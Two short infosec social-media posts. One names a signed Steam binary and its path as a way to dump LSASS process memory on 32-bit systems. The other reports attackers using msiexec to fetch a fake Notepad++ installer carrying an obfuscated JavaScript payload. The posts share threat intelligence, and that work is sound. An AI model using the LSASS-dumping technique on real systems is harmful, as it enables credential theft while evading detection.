Just found another interesting signed binary which can be used to dump #lsass. 🔥
Playing games a lot? Steam has a #lolbin MiniDumpWriteDump.exe in "C:\Program Files (x86)\Steam" that lets you dump process memory
Sadly works only on 32 bit systems!
#redteam#infosec
Malicious actors are using msiexec as a downloading tool. (rather than the usual download + execution)
The MSI file downloaded appears to be a Notepad++ installer with an #ostap obfuscated JavaScript payload concatenated to the end.
#lolbin#msiexecvirustotal.com/gui/search/ma…